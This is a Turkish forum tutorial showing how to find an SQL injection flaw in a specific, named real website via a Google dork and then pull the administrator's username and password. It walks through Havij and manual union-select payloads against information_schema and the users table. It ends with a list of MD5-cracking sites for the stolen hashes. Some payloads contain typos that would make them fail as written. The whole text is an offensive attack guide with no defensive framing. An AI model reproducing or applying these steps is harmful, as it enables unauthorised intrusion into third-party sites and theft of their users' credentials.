Hedef Sitede SQL Bug Bulma Admin Pass Ele Geçirme

1. Hedef Sitede SQL Açığı Bulma ve Yönetici Kullanıcı Adı ve Şifreyi Ele Geçirme
2.  
3. SELAMÜN ALEYKÜM.
4. Umarım hepiniz iyisinizdir.
5. Bugün sizlere Hedef Sitemizde SQL İnj. Acıgı bulmayı Göstereceğim. Ve sonrasında SQL Acıgı ile Adminin Kullanıcı Adı Ve Şifresini çekmeyi göstericeğim.
6. Dökümana bana aittir. Kesinlikle alıntı değildir.
7.  
8. Neden SQL Derseniz . Bana göre günümüzde en yaygın olan güvenlik açıklarından biri , ayrıca herkesin yapabileceği bir teknik.
9. Konuya başlamadan önce SQL hakkında kısa bir bilgi vereyim .
10.  
11. SQL (Structured Query Language) veritabanlarında admin , data çekme, silme ve değiştirme gibi işlemler için kullanılan basit yapılı bir dildir.
12. Bugün hemen hemen tüm web uygulamalarının altyapısında veritabanı desteği vardır ve bu web uygulamaları veritabanı ile SQL aracılığıyla anlaşırlar.
13.  
14. SQL İnjection’u kullanabilmamiz için sayfa url’sinde bize ;
15. id=değer", "search=değer" gibi değişken değerleri alabilen ifadeler lazımdır.
16.  
17. Öncelikle hedef bir site belirleyelim .
18.  
19. Hedef sitemiz :
20. Kod:
21.  
22. [code]www.romanianwriters.ro/[/code]
23.  
24.  
25. Şimdi google yardımı ile sitede id değeri bulacagız .
26. Googlede aratacagımız dorkumuz ;
27.  
28. [code]inurl:?id=site:romanianwriters.ro[/code]
29.  
30. dorkumuzu googlede arattıktan sonra önümüze hedef sitemizdeki id değerleri çıkacaktır.
31.  
32. Arama sonucların en başında
33.  
34. [code]www.romanianwriters.ro/s.php?id=1[/code]
35.  
36. cıktı .
37.  
38. Yukarda dediğim gibi SQL İnjection’u kullanabilmamiz için sayfa url’sinde bize ;
39. id=değer", "search=değer" gibi değişken değerleri alabilen ifadeler lazımdır.
40. gördüğünüz üzere id=değer gibi değişken bulduk :
41.  
42.  
43. [code]www.romanianwriters.ro/s.php?id=1[/code]
44.  
45. Şimdi ise sitede sql açıgı varmı kontrol ediyoruz .
46. Bunu nasıl yaparız :
47. php?id=1 değerden sonra site sonuna ' veya 'a komutu verebiliriz.
48.  
49. [code]www.romanianwriters.ro/s.php?id=1'a[/code]
50.  
51. komutu verelim .
52.  
53. Ekrandaki yazı değişti ve hatada verdi.
54.  
55. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a' LIMIT 1' at line 1
56.  
57. Sitede mysql açıgı mevcut .
58.  
59. Gördüğünüz gibi 2 dakikada bulduk acıgımızı.Şimdi ise injecktion yaparak kolonları , admin giriş bilgilerini vs çekebiliriz.
60. İnjectionu 2 türlü yapabiliriz.
61.  
62. 1. Havij ve benzeri programlar ile
63.  
64. 2. Manuel olarak
65.  
66. Manuel SQl inj Havijin yaptığı elle yapılanıdır.
67.  
68. Havij gibi benzeri programlar otomatik olarak yapılanıdır.
69.  
70. Havij ile nasıl yaparız :
71. Öncelikle havij programı olmayan arkadaşlar havijin kendi sitesinden indirebilir ;
72.  
73. [code]http://www.itsecteam.com/files/havij/Havij1.15Free.rar[/code]
74.  
75. Havij programı ile admin pass çekme - kullanımı :
76.  
77. [img]http://k1304.hizliresim.com/18/f/m17v4.png[/img]
78.  
79. [img]http://k1304.hizliresim.com/18/f/m17vf.png[/img]
80.  
81. [img]http://k1304.hizliresim.com/18/f/m17vm.png[/img]
82.  
83. Gördüğünüz üzere SQL açıgından yola cıkıp havij programı desteği ile admin pass ve admin panelinide bulabiliyoruz.
84.  
85. Fakat her SQL'ı havij ile çözemessiniz.
86.  
87. Bu nedenle yüksek düzeyde manuel sql ögrenmelisiniz.Ama yeniler havij kullanarak bir çok site hackleyebilirsiniz.
88.  
89. Manuel olarak SQL İnjection Nasıl Yapılır ?
90.  
91. Manuel sql yapmak için öncelikle hedef sitemizde kolon sayısını bulacağız bunun için ordey+by+ veya group+by+ komutunu kullanacağız
92. Kod:
93.  
94. [code]www.hedefsite.com/php?.id=1+order+by+100[/code]
95.  
96. bu yüz sayısını misal veriyorum.
97. Bu sayıyı gittikçe azaltıp devam edicez.Mesela
98.  
99. [code]www.hedefsite.com/php?.id=1+order+by+5[/code]
100.  
101. de hata değişiyor ise kolon sayımız 5'tir.
102. Kolon sayımızı ögrendiğimize göre şimdi kolonları ekrana yansıtabiliriz.
103. Bunun için union+select+... kodumuzu kullanacağız.
104.  
105. [code]www.hedefsite.com/php?.id=1+union+select+0,1,2,3,4,5[/code]
106.  
107. yazıyoruz.Kolon sayımız 5 olduğu için 5e kadar yazıcagız.Sizin kolon sayınız başka olabilir .
108. Böyle kolonlarımızı ekrana yansıttık. Bazen bu komut ile kolonlar ekrana yansımıyor .
109.  
110. Eger bu komut ile kolonlar ekrana yansımaz ise URL’mizin sonuna -- ifadesini ekleriz.
111.  
112. Evet diyelimki 2 ve 4 kolonları cıktı ekrana.
113. Bu Sayılardan tablo nasıl çekilir ?
114.  
115. [code]
116. www.hedefsite.com/php?.id=1+union+select+0,1,concat(table),3,4,5+from+information_schema.tables[/code]
117.  
118.  
119. yaparak
120. tablo isimlerini çekeriz. Ama hepsini çekmez . Hepsini çekmek için.
121.  
122. [code]www.hedefsite.com/php?.id=1+union+select+0,1group_concat(table_name),3,4,5+from+information_schema.tables[/code]
123.  
124. tablo isimleri yansıdı . Kücük harflerle yazılan isimler bize lazım olan tablolar.
125. Tabloların içinde örneğin users admins gibi tablo isimleri gördük . Bu isimleri kolonları bulmak için kullanıcaz.
126. Örnegin usersden yola çıkalım.
127.  
128. [code]www.hedefsite.com/php?.id=1+union+select+0,1,group_concat(column_name),3,4,5+from+information_schema.columuns+where+table_name="users"[/code]
129.  
130. Şimdi kolonlar ekrana yansımış olur . örneğin user_id , user_name , user_password , user_email olsun.
131.  
132. Şimdi bu kolonları kullanıp admin şifrelerini bulucaz.
133.  
134. [code]www.hedefsite.com/php?.id=1+union+select+0,1,concat(user_id,user_name,user_password,user_email)+from+user[/code]
135.  
136. Evet ekrana admin kullanıcı adı - şifresi - üyelik no su - ve emaili yansıdı .
137.  
138. Yansıyan şifre büyük bir ihtimalle md5 olarak yansımıştır.
139. Bu md5'i kırmamız gerekiyor .
140.  
141. Md5 nasıl kırarım ? :
142. MD5 yöntemi ile sifrelenmiş passwordleri md5 kırıcı siteler yardımı ile kırabiliriz.
143. Örnek md5 kıran siteler :
144. [code]
145. http://www.hashkiller.co.uk/
146. http://www.md5crack.com/
147. http://www.hash-cracker.com/
148. http://www.md5online.org/
149. http://www.md5decrypt.org/
150. http://www.md5lab.com/
151. https://md5.darkbyte.ru/
152. http://md5encryption.com/
153. http://md5decryption.com/
154. http://www.hashchecker.de/
155. http://md5.com.cn/
156. http://md5.my-addr.com/
157. http://www.md5.net/
158. http://md5.rednoize.com/
159. http://www.md5crack.com/
160. http://tools.benramsey.com/md5/
161. http://www.md5crack.com/
162. http://www.md5this.com/
163. http://www.cmd5.org/
164. http://www.xmd5.org/
165. http://www.md5-hash.com/
166. http://www.iwebtool.com/md5
167. http://md5hashing.net/hashing/md5
168. https://quickhash.com/
169. http://crypo.in.ua/tools/eng_md5.php
170. http://www.md5-crypt.com/
171. http://www.tools4noobs.com/online_tools/encrypt/
172. https://crackstation.net/
173. http://encryption.online-toolz.com/tools/text-encryption-decryption.php
174. http://www.crypo.com/
175. http://www.md5lab.com/?word=online
176. http://www.md5rainbow.com/
177. http://password-decrypt.com/
178. http://decryptpassword.net/
179. http://www.md5decrypter.com/
180. http://lokmanakkaya.com/md5-sifre-cozucu/[/code]
181.  
182. Ayrıca bu linkteki konu tamamen bana aittir. MD5 Kırma ile Alakalı Herşey
183.  
184. [code]http://www.cyberizm.org/cyberizm-md5-sifre-kirmayla-alakali-hersey-videolu-resimli-anlatim.html[/code]
185.  
186. Not => Döküman tamamen bana aittir. İyi Kullanımlar :)